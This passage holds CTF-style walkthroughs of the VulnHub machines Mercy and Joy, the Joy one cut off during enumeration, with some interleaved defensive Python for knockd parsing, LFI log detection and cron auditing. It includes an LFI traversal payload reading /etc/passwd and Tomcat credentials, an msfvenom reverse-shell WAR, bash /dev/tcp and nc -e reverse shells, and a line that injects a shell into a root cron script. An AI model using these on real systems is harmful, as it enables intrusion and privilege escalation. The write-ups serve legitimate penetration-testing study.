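        return [path for path, _, _ in unexpected(find_setid(root), prefix=root)]


if __name__ == "__main__":
    for path, mode, uid in unexpected(find_setid("/")):
        print(f"{mode:04o} uid={uid} {path}")
```

Run it as the low-privilege shell user on the target; anything it prints that is owned by uid 0 deserves the question the author asked of cp, namely what a root-owned file that this binary can write would do when root next uses it.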

Digitalworld Mercy Vulnhub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Mercy V2 https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

I liked this box; it reminds me of OSCP exam machines and good Hack The Box machines. It requires enumeration across multiple services, exploits several different vulnerabilities, and has three distinct stages: initial access, a user account, and root. I love the three-stage layout because I’m used to it from Hack The Box, but OSCP machines don’t always have three stages.

Luckily, much of what mattered for solving this box was in the Nmap output; there would have been rabbit holes had I missed that. It really makes me think I missed things in the exam that kept me from having the full picture of the machines. I am glad I am purposefully working on making my enumeration thorough and on taking good notes (including the things that didn’t work out).

This machine would have been more difficult if there were no robots.txt files.

Flow

  1. Enumerate ports
  2. Port 8080 – /tryharder/tryharder
  3. SMB qiu share works with qiu:password (clue from tryharder file)
  4. Download qiu files from SMB share
  5. Knock to open up port 22 and port 80 (knockd settings in SMB share file)
  6. Find LFI in RIPS 0.53 on port 80
  7. Read files on filesystem via LFI
    1. Read /etc/passwd to get local usernames
    2. Read tomcat configuration to get more logins (tomcat admin and local user)
  8. Log in to Tomcat admin interface, upload a reverse shell war file, get a reverse shell
  9. Pivot to fluffy user
  10. Pop a root shell from a root cronjob, editing a file writable by fluffy
  11. Get flag

Initial Enumeration

IP="10.88.42.132"
mkdir -p nmap
nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_$IP $IP
nmap -Pn -sC -sV -p 1000-65535 -oA nmap/nmap_1000plus_$IP $IP
nmap -sC -sU -p 1-1000 -oA nmap/nmap_udp1000_$IP $IP

TCP Ports 1-1000

# Nmap 7.80 scan initiated Sun Jun 14 12:48:55 2020 as: nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.0014s latency).
Not shown: 991 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  filtered ssh
53/tcp  open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp  filtered http
110/tcp open     pop3        Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES STLS AUTH-RESP-CODE SASL CAPA PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open     imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login OK have LOGINDISABLEDA0001 LOGIN-REFERRALS STARTTLS SASL-IR listed Pre-login more capabilities IDLE IMAP4rev1 ID ENABLE LITERAL+
|_ssl-date: TLS randomness does not represent time
445/tcp open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open     ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open     ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2020-06-15T00:49:10+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-14T16:49:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 12:51:36 2020 -- 1 IP address (1 host up) scanned in 160.82 seconds

TCP Ports 1000-65535

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 12:52 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
Not shown: 64535 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

UDP Ports 1-1000

# Nmap 7.80 scan initiated Sun Jun 14 12:56:33 2020 as: nmap -sC -sU -p 1-1000 -oA nmap/nmap_udb1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT    STATE         SERVICE
53/udp  open          domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
123/udp open          ntp
| ntp-info: 
|_  
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
323/udp open|filtered unknown
631/udp open|filtered ipp
MAC Address: 00:0C:29:67:71:C0 (VMware)

Host script results:
|_clock-skew: 8s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

# Nmap done at Sun Jun 14 13:16:06 2020 -- 1 IP address (1 host up) scanned in 1172.80 seconds

SMB Enumeration

[13:21:03]🔥root[ /home/kali/VulnHub/mercy ]# smbclient -L 10.88.42.132 
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[13:21:18]🔥root[ /home/kali/VulnHub/mercy ]# 

So, qiu is interesting. Keep track of that as a possible user.

TCP 8080 – /tryharder/tryharder Step

Nmap found a robots.txt with one disallowed path.

robots.txt

http://10.88.42.132:8080/robots.txt
User-agent: *
Disallow: /tryharder/tryharder

/tryharder/tryharder


The file is base64-encoded; decoded, it reads:

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

Port 8080 – Normal

Attempting to access the Tomcat manager/admin interface requires a login, which is no surprise. It is Tomcat 7.

SMB Share – qiu

I am a dummy here again. I get that the “password” is clearly spelled out, but I was so used to being tricked that I tried every word of the decoded tryharder file as the password.

for pass in $(cat tryharder.txt); do echo ">> $pass <<" && smbclient \\\\10.88.42.132\\qiu -U qiu "$pass" 2>/dev/null ; done

The loop blocked at an interactive smb: \> prompt once it reached “password”, which works; adding -c ls to the smbclient call would make each attempt non-interactive. After that, I literally said to myself, “you’re a dummy.”

We can log in directly.

Now we should download all the files.

prompt
recurse
mget *

The only important files are config and configprint, with configprint appending configuration files to the config file. It includes multiple configs, but the one we care about is the knockd configuration because ports 80 and 22 are filtered (and likely firewalled off).

configprint

#!/bin/bash

echo "Here are settings for your perusal." > config
echo "" >> config
echo "Port Knocking Daemon Configuration" >> config
echo "" >> config
cat "/etc/knockd.conf" >> config
echo "" >> config
echo "Apache2 Configuration" >> config
echo "" >> config
cat "/etc/apache2/apache2.conf" >> config
echo "" >> config
echo "Samba Configuration" >> config
echo "" >> config
cat "/etc/samba/smb.conf" >> config
echo "" >> config
echo "For other details of MERCY, please contact your system administrator." >> config

chown qiu:qiu config

config (knockd parts of interest)

...

[openHTTP]
	sequence    = 159,27391,4
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

...

[openSSH]
	sequence    = 17301,28504,9999
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
...

Knock Knock

for port in 17301 28504 9999; do nc -z -w 1 10.88.42.132 $port; done   # openSSH sequence
for port in 159 27391 4; do nc -z -w 1 10.88.42.132 $port; done        # openHTTP sequence

A plain connect attempt is enough: knockd sniffs the SYN, so “connection refused” from each closed port is the expected result. -z sends no data, and -w 1 keeps a silently dropped port from hanging the loop. The iptables rule is inserted for the knocking source IP only (%IP%), and the whole sequence has to arrive within seq_timeout (100 seconds).
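Replaying the knock from a script, as an added example that is not part of the walkthrough: parse the knockd sections into port sequences, send the SYNs in order, then verify that the guarded port now answers. The embedded config is a copy of the two sections above plus an [options] stanza, the target address is assumed, and the parser keeps only the port number of entries such as 7000:udp (the sequences on this box are all TCP).

```python
"""Parse knockd.conf sections and replay a knock, then confirm the port opened.

Added example, not from the walkthrough.  KNOCKD_CONF is a constructed copy of
the sections recovered from the share; the target address is assumed.
parse_knockd() is pure; knock(), port_open() and open_service() use sockets.
"""
import socket
import time

KNOCKD_CONF = """
[options]
\tlogfile = /var/log/knockd.log

[openHTTP]
\tsequence    = 159,27391,4
\tseq_timeout = 100
\tcommand     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
\ttcpflags    = syn

[openSSH]
\tsequence    = 17301,28504,9999
\tseq_timeout = 100
\tcommand     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
\ttcpflags    = syn
"""


def parse_knockd(text):
    """{section: {"sequence": [ports], "seq_timeout": int, "dport": int|None}}
    for every section that defines a sequence.  A tiny INI reader is used on
    purpose: knockd indents options and uses %IP%, which trips configparser.
    The --dport is taken from the iptables command so we know what to verify."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            sections[current][key] = value
    rules = {}
    for name, opts in sections.items():
        if "sequence" not in opts:
            continue
        # "7000:udp" style entries keep the port; protocol is dropped (assumed TCP).
        seq = [int(p.split(":")[0]) for p in opts["sequence"].split(",")]
        cmd = opts.get("command", "")
        dport = int(cmd.split("--dport", 1)[1].split()[0]) if "--dport" in cmd else None
        rules[name] = {
            "sequence": seq,
            "seq_timeout": int(opts.get("seq_timeout", 5)),  # 5 assumed when absent
            "dport": dport,
        }
    return rules


def knock(host, sequence, delay=0.2, timeout=1.0):
    """One SYN per port, in order.  A connect() attempt is enough: knockd
    sniffs the SYN, so 'refused' from a closed port is the normal outcome and
    a timeout just means the port is being dropped."""
    for port in sequence:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass
        finally:
            s.close()
        time.sleep(delay)


def port_open(host, port, timeout=2.0):
    """True if a full handshake completes, i.e. the ACCEPT rule for our
    source address is now in place."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def open_service(host, rules, name):
    """Knock the named section's sequence and report whether its port opened."""
    rule = rules[name]
    knock(host, rule["sequence"])
    return port_open(host, rule["dport"])


if __name__ == "__main__":
    target = "10.88.42.132"  # assumed from the walkthrough
    rules = parse_knockd(KNOCKD_CONF)
    for name in ("openSSH", "openHTTP"):
        state = "open" if open_service(target, rules, name) else "still closed"
        print(f"{name}: knocked {rules[name]['sequence']} -> port {rules[name]['dport']} {state}")
```

Because the rule keys on %IP%, the knock has to come from the same address that will use the service; from behind NAT that is the NAT address, and a VPN or proxy in the path breaks it.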

Enumerate Port 22

# Nmap 7.80 scan initiated Sun Jun 14 14:04:48 2020 as: nmap -sC -sV -oA nmap/nmap_port22tcp_10.88.42.132 -p22 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 93:64:02:58:62:0e:e7:85:50:d9:97:ea:8d:01:68:f6 (DSA)
|   2048 13:77:33:9a:49:c0:51:dc:8f:fb:c8:33:17:b2:05:71 (RSA)
|   256 a2:25:3c:cf:ac:d7:0f:ae:2e:8c:c5:14:c4:65:c1:59 (ECDSA)
|_  256 33:12:1b:6a:98:da:ea:9d:8c:09:94:ed:44:8d:4e:5b (ED25519)
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:04:48 2020 -- 1 IP address (1 host up) scanned in 0.74 seconds

There is nothing special there, other than knowing it is Ubuntu, so at least we can discern file paths (for later).

I tried the qiu login, and it didn’t work for SSH.

Port 80

Enumerate

# Nmap 7.80 scan initiated Sun Jun 14 14:02:07 2020 as: nmap -sC -sV -oA nmap/nmap_port80tcp_10.88.42.132 -p80 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00065s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/mercy /nomercy
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:02:14 2020 -- 1 IP address (1 host up) scanned in 6.73 seconds

Nmap found the robots.txt file and showed the contents. Let’s look at it more.

robots.txt

User-agent: *
Disallow: /mercy
Disallow: /nomercy

Port 80 – /mercy

Welcome to Mercy!

We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.

I made a mental note of that. It rang a bell later.

Port 80 – /nomercy

It is running RIPS 0.53. So what is the first thing I should do when I find a web app with a version I’ve never heard of… well, I run searchsploit.

There’s an LFI. The LFI also works.

http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd

Or to grab it with the garbage removed.

wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd | awk -F'? ' '{print $2}'
...
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh

Getting The Tomcat Configuration Files

I wasn’t sure where Ubuntu stored Tomcat files, so I looked it up. I found https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory, and I am now looking for these files.

/etc/tomcat7/server.xml
/etc/tomcat7/tomcat-users.xml
/etc/tomcat7/web.xml
/etc/tomcat7/catalina.properties

So I grabbed them all and saved them locally, and converted the HTML entities back to ASCII.

for file in server.xml tomcat-users.xml web.xml catalina.properties; do wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/$file | awk -F'? ' '{print $2}' | sed -e 's/&quot;/"/g' -e 's/&gt;/>/g' -e 's/&lt;/</g' > $file ; done
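From the defender’s side, the request shape used above (code.php?file=../../…) is easy to spot in the web server logs. The following is an added example, not from the original post: it scans constructed Apache combined-log lines, decodes each query value (including double-encoded %252e variants) and flags traversal attempts, marking the ones that reach files such as /etc/passwd or tomcat-users.xml.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines (not from the post). Lines 2-4 copy the
# request shape used above with plain, single- and double-encoded traversal.
SAMPLE_ACCESS_LOG = """\
10.88.42.133 - - [14/Jun/2020:14:10:01 -0400] "GET /nomercy/windows/code.php?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.88.42.133 - - [14/Jun/2020:14:10:07 -0400] "GET /nomercy/windows/code.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Wget/1.20"
10.88.42.133 - - [14/Jun/2020:14:10:09 -0400] "GET /nomercy/windows/code.php?file=..%2F..%2F..%2Fetc%2Ftomcat7%2Ftomcat-users.xml HTTP/1.1" 200 1713 "-" "Wget/1.20"
10.88.42.133 - - [14/Jun/2020:14:10:12 -0400] "GET /nomercy/windows/code.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.88.42.140 - - [14/Jun/2020:14:11:00 -0400] "GET /mercy/ HTTP/1.1" 200 320 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# ".." as a whole path component, with / or \ as the separator
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Files whose disclosure mattered on this box (passwd and the Tomcat configs)
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", "server.xml")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo stacked percent-encoding (%252e -> %2e -> .) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(line: str):
    """Return a finding dict if the request path or any query value traverses, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    candidates = [decode_fully(parts.path)]
    for _key, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates.append(decode_fully(value))  # parse_qsl already decoded once
    for value in candidates:
        if TRAVERSAL_RE.search(value):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "value": value,
                "sensitive": any(s in value for s in SENSITIVE),
            }
    return None


def scan_log(text: str) -> list:
    """All traversal findings in a block of access-log text, in file order."""
    return [f for f in (find_traversal(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_ACCESS_LOG):
        print(finding)
```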

Some logins were found, and the admin/manager account was among them.

thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny

Now that we have the Tomcat admin login, it’s time to try to log in with it.

Port 8080 – Tomcat Revisited

thisisasuperduperlonguser:heartbreakisinevitable (Tomcat admin/manager)
fluffy:freakishfluffybunny (Tomcat normal, no access)

Logging in works for thisisasuperduperlonguser:heartbreakisinevitable.

Now time to get our reverse shell. The common thing to do is to use msfvenom to build a .war file, upload the war in the admin/manager interface, and then browse to the uploaded application, which pops a reverse shell.

Generate the reverse shell .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.88.42.133 LPORT=4444 -f war > sogwtf.war

Start a netcat listener

nc -lvnp 4444

Upload the war file

[Screenshot: Tomcat manager, “WAR file to deploy” upload form]

Spawn reverse shell

[Screenshot: Tomcat manager application list with Start/Stop/Reload/Undeploy controls for the deployed app]

Gain Access To The Machine And Pivot To fluffy

The only other creds I have are for fluffy, so su to that user, and look around.

timeclock Script

#!/bin/bash 

now=$(date) 
echo "The system time is: $now." > ../../../../../var/www/html/time 
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time 
chown www-data:www-data ../../../../../var/www/html/time

An interesting script. It ties in with the port 80 /mercy clue. I didn’t look further and instead homed in on this: I checked the timestamp on the time file and whether fluffy’s crontab was doing it. The file was recently updated, and fluffy didn’t have a crontab. So, I assumed it was root or pleadformercy (with elevated perms to do the chown).

So, I worked to get another reverse shell!

I tested to see if I could get a reverse shell with nc.

[email protected]:~/.private/secrets$ nc -e /bin/bash 10.88.42.133 9000
nc -e /bin/bash 10.88.42.133 9000
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
          [-P proxy_username] [-p source_port] [-q seconds] [-s source]
          [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [destination] [port]
[email protected]:~/.private/secrets$

I pulled up the trusty pentestmonkey reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to get the bash syntax or the other nc one with pipes. The bash one worked!

bash -i >& /dev/tcp/10.88.42.133/9000 0>&1

Getting The root Shell

echo 'bash -i >& /dev/tcp/10.88.42.133/9000 0>&1' >> timeclock

And root shell popped!
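The root cause here is a script that root runs on a schedule but that a low-privileged user owns and can write to. As an added example (not from the original post), here is an audit that reads a system-crontab, finds the scripts root’s jobs execute and reports why each one is unsafe; the crontab lines and the files it checks are constructed in a temporary directory.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List

# Interpreters that may precede the script path in a cron command line
INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}
# System-crontab line: five time fields (or an @shortcut), user, then the command
CRON_LINE_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def script_findings(path: str) -> List[str]:
    """Reasons a script is unsafe to run from root's cron: anyone who can
    change its contents, or replace the file, runs code as root."""
    findings: List[str] = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink")            # cron follows wherever it points
        st = os.stat(path)
    if st.st_uid != 0:
        findings.append("not-owned-by-root")  # the timeclock case: fluffy owns it
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    writable_dir = pst.st_uid != 0 or pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    if writable_dir and not pst.st_mode & stat.S_ISVTX:
        findings.append("parent-dir-replaceable")  # the file itself can be swapped
    return findings


def audit_crontab(crontab_text: str) -> Dict[str, List[str]]:
    """Map every script run as root by a system crontab to its findings."""
    report: Dict[str, List[str]] = {}
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m or m.group("user") != "root":
            continue                          # only root's jobs escalate
        paths = [t for t in m.group("cmd").split()
                 if t.startswith("/") and os.path.basename(t) not in INTERPRETERS]
        if paths:
            script = paths[0]
            report[script] = script_findings(script) if os.path.exists(script) else ["missing"]
    return report


def demo() -> Dict[str, List[str]]:
    """Constructed layout: a world-writable 'timeclock' beside a 0755 script,
    both referenced from a crontab that runs them as root."""
    base = tempfile.mkdtemp()
    loose = os.path.join(base, "timeclock")
    tight = os.path.join(base, "safe.sh")
    for p in (loose, tight):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(loose, 0o777)
    os.chmod(tight, 0o755)
    crontab = (f"* * * * * root {loose}\n"
               f"*/5 * * * * root /bin/bash {tight}\n"
               f"* * * * * fluffy {loose}\n")   # non-root job, ignored
    return {os.path.basename(k): v for k, v in audit_crontab(crontab).items()}


if __name__ == "__main__":
    for script, reasons in demo().items():
        print(script, reasons)
```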

Get The Flags

Digitalworld Joy VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Joy https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly.

I learned that if I find a vulnerability with a public exploit, calm down, take note of it, and keep enumerating because there could be more exploits (more reliable/easy). For example, I wasted a lot more time on the dropbear ssh exploit than I should have.

Flow

  1. Enumerate ports and versions
  2. Download all FTP content
  3. Waste time trying to exploit dropbear ssh
  4. Proftpd allows CPFR and CPTO, but exploit needs the web directory (it isn’t default)
  5. Download patrick’s files via TFTP, discovered by SNMP (also possible to download with the CPFR and CPTO trick; I’ll show both)
  6. Discover web directory from patrick’s files and use proftpd exploit to get a web RCE
  7. Get a reverse shell via RCE
  8. Find patrick’s password and su to patrick
  9. Replace sudo script with CPFR/CPTO trick and get a root shell
  10. Get flag

Initial Enumeration

Nmap – TCP Ports

nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00046s latency).
Not shown: 65523 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:32:A4:6A (VMware)
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2020-06-16T19:54:56+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-16T11:54:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds

Nmap – UDP Ports

SNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that.

nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000  10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (secondary server)
| ntp-info: 
|_ 
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: d1785e76ec962f5c00000000
| snmpEngineBoots: 29
|_ snmpEngineTime: 44m11s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 5.31 Kb sent, 5.31 Kb received
